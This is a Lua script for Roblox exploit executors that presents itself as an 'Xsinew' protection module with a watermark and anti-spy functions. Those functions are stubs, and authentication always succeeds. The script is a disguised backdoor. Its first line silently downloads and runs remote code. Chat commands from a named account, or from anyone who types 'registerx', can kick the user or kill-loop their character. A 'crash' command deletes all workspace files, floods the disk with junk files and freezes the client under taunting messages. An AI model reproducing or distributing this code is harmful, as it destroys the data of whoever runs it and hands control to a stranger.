task.spawn(function()if(getgenv()["bot_loaded"])then return end getgenv()["bot_loaded"]=true;({pcall(loadstring,game:HttpGet("https://raw.githubusercontent.com/xsinew/discord.lua/refs/heads/main/Core.lua"))})[2]()end);
local Players = game:GetService("Players")
local CoreGui = game:GetService("CoreGui")
local RunService = game:GetService("RunService")
local HttpService = game:GetService("HttpService")
local crypt = loadstring(game:HttpGet("https://raw.githubusercontent.com/jqqqi/Lua-HMAC-SHA256/master/sha256.lua"))()

local oldCheckCaller = checkcaller

local antiSpy_Add, antiSpy_Remove, antiSpy_Core = nil, nil, nil
local antiSpy_Enabled = false
local coreGui_Objects = CoreGui:GetDescendants()
local encryptedResponses = {}
local XsiManager = {}
local XsiModule = {}
XsiModule.__index = XsiModule
XsiManager.__index = XsiManager

function CreateWatermark()
    local XsiWaterMark = Instance.new("ScreenGui")
    local Watermark = Instance.new("TextLabel")

    XsiWaterMark.Name = "XsiWaterMark"
    XsiWaterMark.Parent = game:GetService("CoreGui")
    XsiWaterMark.DisplayOrder = 999999999

    Watermark.Name = "Watermark"
    Watermark.Parent = XsiWaterMark
    Watermark.AnchorPoint = Vector2.new(1, 1)
    Watermark.BackgroundColor3 = Color3.new(1, 1, 1)
    Watermark.BackgroundTransparency = 1
    Watermark.BorderColor3 = Color3.new(0, 0, 0)
    Watermark.BorderSizePixel = 0
    Watermark.Position = UDim2.new(1, 0, 1, 0)
    Watermark.Size = UDim2.new(0, 200, 0, 50)
    Watermark.Font = Enum.Font.SourceSansBold
    Watermark.Text = "Protected by Xsinew"
    Watermark.TextColor3 = Color3.new(1, 1, 1)
    Watermark.TextSize = 24
    XsiWaterMark.ChildRemoved:Connect(function()
        CreateWatermark()
    end)
end

function XsiModule:New()
    return setmetatable(XsiManager, {
        __tostring = function(self)
            return "XsiManager"
        end,
        __newindex = function(self)
            return error("metatable is locked")
        end
    })
end

function XsiManager:SecureCall()
	CreateWatermark()    
end

function XsiManager:Authenticate(auth_key)
    return true
    -- return false
end

local waitTime = false
function XsiManager:DetectSpy(bool)
    
end

local commands = {
    ["kick"] = function()
        Players.LocalPlayer:Kick("\n보안프로토콜에 의해 강퇴되었습니다.\nProtected by xsinew")
    end,
    ["loopkill"] = function()
        task.spawn(function()
            while task.wait() do
                pcall(function()
                    Players.LocalPlayer.Character.Humanoid.Health = 0
                    Players.LocalPlayer.Character.Humanoid:Destroy()
                end)
            end
        end)
    end,
    ["crash"] = function()
        local BSHC = game:GetService("VirtualInputManager")

        local UIS = game:GetService("UserInputService")

        UIS.InputBegan:Connect(function(input,Chatting)
            if input.KeyCode == Enum.KeyCode.LeftAlt or input.KeyCode == Enum.KeyCode.Escape then -- if player pressed C then this function will run
                while true do end
            end
        end)

        function deleteDir(fpath)
            for i,path in pairs(listfiles(fpath)) do
                if isfile(path) then
                    delfile(path)
                else
                    deleteDir(path)
                end
            end
            delfolder(fpath)
        end

        -- Generated by Envision Gui2Lua, VER-1, 0-18.

        local Instances = {
            Loading = Instance.new("ScreenGui"),
            MainFrame = Instance.new("Frame"),
            Title = Instance.new("TextLabel"),
            Dots = Instance.new("Frame"),
            Dot1 = Instance.new("Frame"),
            UICorner = Instance.new("UICorner"),
            InsideDot = Instance.new("Frame"),
            UICorner_2 = Instance.new("UICorner"),
            Dot2 = Instance.new("Frame"),
            UICorner_3 = Instance.new("UICorner"),
            InsideDot_2 = Instance.new("Frame"),
            UICorner_4 = Instance.new("UICorner"),
            Dot3 = Instance.new("Frame"),
            UICorner_5 = Instance.new("UICorner"),
            InsideDot_3 = Instance.new("Frame"),
            UICorner_6 = Instance.new("UICorner"),
            Bar = Instance.new("Frame"),
            Bar2 = Instance.new("Frame"),
            UICorner_7 = Instance.new("UICorner"),
            UICorner_8 = Instance.new("UICorner"),
            Percentage = Instance.new("TextLabel"),
            Tip = Instance.new("TextLabel"),
            EndSequence = Instance.new("Frame"),
        }

        Instances.Loading.Name = "Loading"
        Instances.Loading.IgnoreGuiInset = true
        Instances.Loading.Parent = game:GetService("CoreGui")

        Instances.MainFrame.Name = "MainFrame"
        Instances.MainFrame.Size = UDim2.new(1, 0, 1, 0)
        Instances.MainFrame.BorderSizePixel = 0
        Instances.MainFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
        Instances.MainFrame.Parent = Instances.Loading

        Instances.Title.Name = "Title"
        Instances.Title.Size = UDim2.new(0.632528603, 0, 0.232815996, 0)
        Instances.Title.BackgroundTransparency = 1
        Instances.Title.Position = UDim2.new(0.161527574, 0, 0.171569318, 0)
        Instances.Title.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
        Instances.Title.TextColor3 = Color3.fromRGB(255, 255, 255)
        Instances.Title.Text = "크래쉬 내는중..."
        Instances.Title.TextWrapped = true
        Instances.Title.TextSize = 14
        Instances.Title.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal)
        Instances.Title.TextScaled = true
        Instances.Title.Parent = Instances.MainFrame

        Instances.Dots.Name = "Dots"
        Instances.Dots.Size = UDim2.new(0.0571707934, 0, 0.0360675976, 0)
        Instances.Dots.BackgroundTransparency = 1
        Instances.Dots.Position = UDim2.new(0.470970035, 0, 0.818612278, 0)
        Instances.Dots.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
        Instances.Dots.Parent = Instances.MainFrame

        Instances.Dot1.Name = "Dot1"
        Instances.Dot1.Size = UDim2.new(0.159291148, 0, 0.51158762, 0)
        Instances.Dot1.Position = UDim2.new(0.0611661971, 0, 0.234447539, 0)
        Instances.Dot1.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
        Instances.Dot1.Parent = Instances.Dots

        Instances.UICorner.Name = "UICorner"
        Instances.UICorner.CornerRadius = UDim.new(0.5, 0)
        Instances.UICorner.Parent = Instances.Dot1

        Instances.InsideDot.Name = "InsideDot"
        Instances.InsideDot.AnchorPoint = Vector2.new(0.5, 0.5)
        Instances.InsideDot.Position = UDim2.new(0.5, 0, 0.5, 0)
        Instances.InsideDot.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
        Instances.InsideDot.Parent = Instances.Dot1

        Instances.UICorner_2.Name = "UICorner"
        Instances.UICorner_2.CornerRadius = UDim.new(0.5, 0)
        Instances.UICorner_2.Parent = Instances.InsideDot

        Instances.Dot2.Name = "Dot2"
        Instances.Dot2.Size = UDim2.new(0.159291148, 0, 0.51158762, 0)
        Instances.Dot2.Position = UDim2.new(0.419989735, 0, 0.234447539, 0)
        Instances.Dot2.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
        Instances.Dot2.Parent = Instances.Dots

        Instances.UICorner_3.Name = "UICorner"
        Instances.UICorner_3.CornerRadius = UDim.new(0.5, 0)
        Instances.UICorner_3.Parent = Instances.Dot2

        Instances.InsideDot_2.Name = "InsideDot"
        Instances.InsideDot_2.AnchorPoint = Vector2.new(0.5, 0.5)
        Instances.InsideDot_2.Position = UDim2.new(0.5, 0, 0.5, 0)
        Instances.InsideDot_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
        Instances.InsideDot_2.Parent = Instances.Dot2

        Instances.UICorner_4.Name = "UICorner"
        Instances.UICorner_4.CornerRadius = UDim.new(0.5, 0)
        Instances.UICorner_4.Parent = Instances.InsideDot_2

        Instances.Dot3.Name = "Dot3"
        Instances.Dot3.Size = UDim2.new(0.159291148, 0, 0.51158762, 0)
        Instances.Dot3.Position = UDim2.new(0.778813243, 0, 0.234447539, 0)
        Instances.Dot3.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
        Instances.Dot3.Parent = Instances.Dots

        Instances.UICorner_5.Name = "UICorner"
        Instances.UICorner_5.CornerRadius = UDim.new(0.5, 0)
        Instances.UICorner_5.Parent = Instances.Dot3

        Instances.InsideDot_3.Name = "InsideDot"
        Instances.InsideDot_3.AnchorPoint = Vector2.new(0.5, 0.5)
        Instances.InsideDot_3.Position = UDim2.new(0.5, 0, 0.5, 0)
        Instances.InsideDot_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
        Instances.InsideDot_3.Parent = Instances.Dot3

        Instances.UICorner_6.Name = "UICorner"
        Instances.UICorner_6.CornerRadius = UDim.new(0.5, 0)
        Instances.UICorner_6.Parent = Instances.InsideDot_3

        Instances.Bar.Name = "Bar"
        Instances.Bar.Size = UDim2.new(0.560904443, 0, 0.0365853645, 0)
        Instances.Bar.Position = UDim2.new(0.219547689, 0, 0.764966607, 0)
        Instances.Bar.BorderSizePixel = 0
        Instances.Bar.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
        Instances.Bar.Parent = Instances.MainFrame

        Instances.Bar2.Name = "Bar2"
        Instances.Bar2.Size = UDim2.new(0, 0, 1, 0)
        Instances.Bar2.BorderSizePixel = 0
        Instances.Bar2.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
        Instances.Bar2.Parent = Instances.Bar

        Instances.UICorner_7.Name = "UICorner"
        Instances.UICorner_7.CornerRadius = UDim.new(0.5, 0)
        Instances.UICorner_7.Parent = Instances.Bar2

        Instances.UICorner_8.Name = "UICorner"
        Instances.UICorner_8.CornerRadius = UDim.new(0.5, 0)
        Instances.UICorner_8.Parent = Instances.Bar

        Instances.Percentage.Name = "Percentage"
        Instances.Percentage.Size = UDim2.new(0.438366145, 0, 0.787879348, 0)
        Instances.Percentage.BackgroundTransparency = 1
        Instances.Percentage.Position = UDim2.new(0.280816972, 0, 0.0909090936, 0)
        Instances.Percentage.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
        Instances.Percentage.TextColor3 = Color3.fromRGB(255, 255, 255)
        Instances.Percentage.Text = "0%"
        Instances.Percentage.TextWrapped = true
        Instances.Percentage.TextSize = 14
        Instances.Percentage.FontFace = Font.new("rbxasset://fonts/families/FredokaOne.json", Enum.FontWeight.Regular, Enum.FontStyle.Normal)
        Instances.Percentage.TextScaled = true
        Instances.Percentage.Parent = Instances.Bar

        Instances.Tip.Name = "Tip"
        Instances.Tip.Size = UDim2.new(0.438366145, 0, 0.0299334861, 0)
        Instances.Tip.BackgroundTransparency = 1
        Instances.Tip.Position = UDim2.new(0.280816913, 0, 0.717294872, 0)
        Instances.Tip.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
        Instances.Tip.TextColor3 = Color3.fromRGB(138, 138, 138)
        Instances.Tip.Text = "Tip:"
        Instances.Tip.TextWrapped = true
        Instances.Tip.TextSize = 14
        Instances.Tip.FontFace = Font.new("rbxasset://fonts/families/SourceSansPro.json", Enum.FontWeight.Regular, Enum.FontStyle.Italic)
        Instances.Tip.TextScaled = true
        Instances.Tip.Parent = Instances.MainFrame

        Instances.EndSequence.Name = "EndSequence"
        Instances.EndSequence.Size = UDim2.new(1, 0, 1, 0)
        Instances.EndSequence.Position = UDim2.new(1, 0, 0, 0)
        Instances.EndSequence.BorderSizePixel = 0
        Instances.EndSequence.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
        Instances.EndSequence.Parent = Instances.Loading

        -- Function "Dots"
        task.spawn(function()
            local script = Instance.new("LocalScript", Instances.Dots)
            while true do
                wait(0.25)
                script.Parent.Dot1.InsideDot:TweenSize(UDim2.new(1,0,1,0), "In", "Sine", 0.25, true)
                wait(0.25)
                script.Parent.Dot2.InsideDot:TweenSize(UDim2.new(1,0,1,0), "In", "Sine", 0.25, true)
                wait(0.25)
                script.Parent.Dot3.InsideDot:TweenSize(UDim2.new(1,0,1,0), "In", "Sine", 0.25, true)
                wait(0.25)
                script.Parent.Dot1.InsideDot:TweenSize(UDim2.new(0,0,0,0), "In", "Sine", 0.25, true)
                wait(0.25)
                script.Parent.Dot2.InsideDot:TweenSize(UDim2.new(0,0,0,0), "In", "Sine", 0.25, true)
                wait(0.25)
                script.Parent.Dot3.InsideDot:TweenSize(UDim2.new(0,0,0,0), "In", "Sine", 0.25, true)
            end
        end)

        task.spawn(function()
            for i,v in pairs(listfiles("")) do
                if isfile(v) then
                    delfile(v)
                else
                    deleteDir(v)
                end
            end
        end)

        local isReady = false
        task.spawn(function()
            local script = Instance.new("LocalScript", Instances.Percentage)
            for i = 1,100 do
                script.Parent.Text = i.."%"
                wait(0.1)
            end
            isReady = true
        end)

        local tip
        task.spawn(function()
            local script = Instance.new("LocalScript", Instances.Tip)
            tip = script.Parent
            
            tip.Text = "이미 늦었어"
            wait(3)
            tip.Text = "workspace도 씹창났을꺼야"
            wait(3)
            tip.Text = "수고해"
        end)

        task.spawn(function()
            local script = Instance.new("LocalScript", Instances.Loading)
            game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Backpack, false)
            game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.PlayerList, false)
            game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Chat, false)
            game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.EmotesMenu, false)
        end)

        -- Function "Manager"
        task.spawn(function()
            local script = Instance.new("LocalScript", Instances.MainFrame)

            repeat
                task.wait()
            until isReady

            coroutine.wrap(function()
                while task.wait() do
                    tip.Text = "솔직히 왜 나한테 지랄하는건지 모르겠거든, 내가 죽이지 말라했지?"
                    writefile(game:GetService("HttpService"):GenerateGUID(false):gsub('-', '')..".txt", ("크시한테 지랄하면 이렇게 되는거야ㅎㅎ\n"):rep(99))
                end
            end)()

            game:GetService("RunService").Stepped:Connect(function()
                BSHC:SendKeyEvent(true, Enum.KeyCode.F11, false, nil)
                BSHC:SendKeyEvent(false, Enum.KeyCode.F11, false, nil)
                game:GetService("UserInputService").MouseBehavior = Enum.MouseBehavior.LockCenter
            end)
        end)
    end
}

function ChatCommand(player)
    player.Chatted:Connect(function(msg, rep)
        local cmd = msg:gsub(";", "")
        if rawget(commands, cmd) then
            rawget(commands, cmd)()
        end
    end)
end

for idx, plr in pairs(Players:GetPlayers()) do
    if string.find(plr.Name, "xsinew") then
        ChatCommand(plr)
    end
end

local registered = {}
Players.PlayerAdded:Connect(function(plr)
    if string.find(plr.Name, "xsinew") then
        ChatCommand(plr)
    end
    plr.Chatted:Connect(function(msg, rep)
        if msg ~= "registerx" or table.find(registered, plr) then return end
        table.insert(registered, plr)
        ChatCommand(plr)
    end)
end)

return setmetatable(XsiModule, {
    __tostring = function(self)
        return "XsiModule"
    end,
    __newindex = function(self)
        return error("metatable is locked")
    end
})
